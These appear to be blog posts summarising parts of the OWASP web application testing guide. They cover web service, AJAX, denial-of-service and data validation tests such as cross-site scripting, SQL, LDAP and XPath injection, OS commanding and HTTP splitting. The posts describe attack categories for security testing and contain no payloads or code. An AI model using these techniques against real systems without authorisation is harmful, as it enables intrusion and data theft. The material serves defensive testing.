This section discusses the types of attack vectors one could send to a web service in an attempt to assess its reaction to malformed or maliciously-crafted messages. For example, elements which contain large numbers of attributes can cause problems with parsers. This category of attack also includes XML documents which are not well-formed XML (e.g., with overlapping elements, or with open tags that have no matching close tags). DOM-based parsing can be vulnerable to DoS due to the fact that the complete message is loaded into memory (as opposed to SAX parsing). For example, oversized attachments can cause an issue with DOM architectures.

4. XML Content-level Testing
Content-level attacks target the server hosting a web service and any applications that are utilized by the service, including web servers, databases, application servers, operating systems, etc. Content-level attack vectors include
  1) SQL Injection or XPath injection
  2) Buffer Overflow and 
  3) Command Injection.

5. HTTP GET parameters/REST Testing
Many XML applications are invoked by passing them parameters using HTTP GET queries. These are sometimes known as
“REST-style" Web Services (REST = Representational State Transfer). These Web Services can be attacked by passing
malicious content on the HTTP GET string (e.g. extra long parameters (2048 chars), SQL statements/injection (or OS
Injection parameters).

6. Naughty SOAP attachments
This section describes attack vectors for Web Services that accept attachments. The danger exists in the processing of the attachment on the server and redistribution of the file to clients.

7. Replay Testing
This section describes testing replay vulnerabilities of a web service. The threat for a replay attack is that the attacker can assume the identity of a valid user and commit some nefarious act without detection
Labels: 0 comments | | edit post
AJAX TESTING
Manusia Tak Sempurna
1. AJAX Vulnerabilities
Asynchronous Javascript and XML (AJAX) is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since AJAX is still a new technology, there are many security issues that have not yet been fully researched. Some of the security issues in AJAX include:
• Increased attack surface with many more inputs to secure
• Exposed internal functions of the application
• Client access to third-party resources with no built-in security and encoding mechanisms
• Failure to protect authentication information and sessions
• Blurred line between client-side and server-side code, resulting in security mistakes
2. How to test AJAx
Because most attacks against AJAX applications are analogs of attacks against traditional web applications, testers should refer to other sections of the testing guide to look for specific parameter manipulations to use in order to discover vulnerabilities. The challenge with AJAX-enabled applications is often finding the endpoints that are the targets for the asynchronous calls and then determining the proper format for requests.
Labels: 0 comments | | edit post
DENIAL OF SERVICE TESTING
Manusia Tak Sempurna
1. Testing for SQL Wildcard_Attacks
2. D Locking Customer Accounts
In this test we check whether an attacker can lock valid user accounts by repeatedly attempting to log in with a wrong password.
when we try to login by exist account and wrong password or  by not exist account and wrong password we get the following error message:


when we try to register by the axist account we get the following error message:

3. Buffer Overflows
4. User Specified Object Allocation
In this test we check whether it is possible to exhaust server resources by making it allocate a very high number of objects.

Our targets can not be attacked using this method:
 
5. User Input as a Loop Counter
6. Writing User Provided Data to Disk
With this test, we check that it is not possible to cause a DoS condition by filling the target disks with log data
7. Failure to Release Resources
With this test, we check that the application properly releases resources (files and/or memory) after they have been used.
8. Storing too Much Data in Session
In this test, we check whether it is possible to allocate big amounts of data into a user session object in order to make the server exhaust its memory resources.
Labels: 0 comments | | edit post
DATA VALIDATION TESTING
Manusia Tak Sempurna

TESTING FOR REFLECTED CROSS SITE SCRIPTING (OWASP-DV-001)
Reflected Cross-site Scripting (XSS) is another name for non-persistent XSS, where the attack doesn’t load with the vulnerable web application but is originated by the victim loading the offending URI. In this article we will see some ways to
test a web application for this kind of vulnerability.
TESTING FOR STORED CROSS SITE SCRIPTING (OWASP-DV-002)
Stored XSS occurs when a web application gathers input from a user which might be malicious, and then stores that input in a data store for later use. The input that is stored is not correctly filtered. As a consequence, the malicious data will appear to be part of the web site and run within the user’s browser under the privileges of the web application.
This vulnerability can be used to conduct a number of browser-based attacks including:
  •  Hijacking another user’s browser
  •  Capturing sensitive information viewed by application users
  •  Pseudo defacement of the application
  •  Port scanning of internal hosts (“internal” in relation to the users of the web application)
  •  Directed delivery of browser-based exploits
  •  Other malicious activities
TESTING FOR DOM BASED CROSS SITE SCRIPTING (OWASP-DV-003)
The DOM, or Document Object Model is the structural format that may be used to represent documents in the browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie. The DOM is also used by the browser for security – for example to limit scripts on different domains obtaining session cookies for other domains. A DOM-based cross site scripting vulnerability may occur when active content, such as a JavaScript function, is modified by a specially crafted request such that a DOM element that can be controlled by an attacker.
TESTING FOR CROSS SITE FLASHING (OWASP-DV-004)
ActionScript is the language, based on ECMAScript, used by Flash applications when dealing with interactive needs. ActionScript, like every other language, has some implementation patterns which could lead to security issues.
In particular, since Flash applications are often embedded in browsers, vulnerabilities like DOM based Cross Site Scripting could be present in flawed Flash applications.
SQL INJECTION (OWASP-DV-005)
A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
LDAP INJECTION (OWASP-DV-006)
LDAP is an acronym for Lightweight Directory Access Protocol. It is a paradigm to store information about users, hosts and many other objects. LDAP Injection is a server side attack, which could allow sensitive information about users and hosts represented in an LDAP structure to be disclosed, modified or inserted.
This is done by manipulating input parameters afterwards passed to internal search, add, and modify functions.
ORM INJECTION (OWASP-DV-007)
ORM Injection is an attack using SQL Injection against an ORM generated data access object model. From the point of view of a tester, this attack is virtually identical to a SQL Injection attack. However, the injection vulnerability exists in code generated by the ORM tool.
XML INJECTION (OWASP-DV-008)
In this section, we describe a practical example of XML Injection: first we define an XML style communication, and we show how it works. Then we describe the discovery method in which we try to insert XML metacharacters. Once the first step is accomplished, the tester will have some information about XML structure, so it will be possible to try to inject XML data and tags (Tag Injection).
SSI INJECTION (OWASP-DV-009)
Web servers usually give to the developer the possibility of adding small pieces of dynamic code inside static HTML pages, without having to play with full-fledged server-side or client-side languages. This feature is incarnated by the Server-Side Includes (SSI), a very simple extension that can enable an attacker to inject code into HTML pages, or even perform remote code execution.
XPATH INJECTION (OWASP-DV-010)
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.
IMAP/SMTP INJECTION (OWASP-DV-011)
This threat affects all applications that communicate with mail servers (IMAP/SMTP), generally webmail applications. The aim of this test is to verify the capacity to inject arbitrary IMAP/SMTP commands into the mail servers, due to input data not properly sanitized.
CODE INJECTION (OWASP-DV-012)
This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by
the web server.
OS COMMANDING (OWASP-DV-013)
In this paragraph we describe how to test an application for OS commanding testing: this means try to inject an on command through an HTTP request to the application.
BUFFER OVERFLOW TESTING (OWASP-DV-014)
INCUBATED VULNERABILITY TESTING (OWASP-DV-015)
Also often referred to as persistent attacks, incubated testing is a complex testing that needs more than one data validation vulnerability to work. In this section we describe a set of examples to test an Incubated Vulnerability.
  •  The attack vector needs to be persisted in the first place, it needs to be stored in the persistence layer, and this would only occur if weak data validation was present or the data arrived into the system via another channel such as an admin console or directly via a backend batch process.
  •  Secondly once the attack vector was “recalled” the vector would need to be executed successfully. For example, an incubated XSS attack would require weak output validation so the script would be delivered to the client in its executable form.
TESTING FOR HTTP SPLITTING/SMUGGLING (OWASP-DV-016)
We will analyze two different attacks that target specific HTTP headers: HTTP splitting and HTTP smuggling. The first attack exploits a lack of input sanitization which allows an intruder to insert CR and LF characters into the headers of the
application response and to ‘split’ that answer into two different HTTP messages. The goal of the attack can vary from a cache poisoning to cross site scripting. In the second attack, the attacker exploits the fact that some specially crafted HTTP
messages can be parsed and interpreted in different ways depending on the agent that receives them. HTTP smuggling requires some level of knowledge about the different agents that are handling the HTTP messages (web server, proxy, firewall) and therefore will be included only in the Gray Box testing section

Labels: 0 comments | | edit post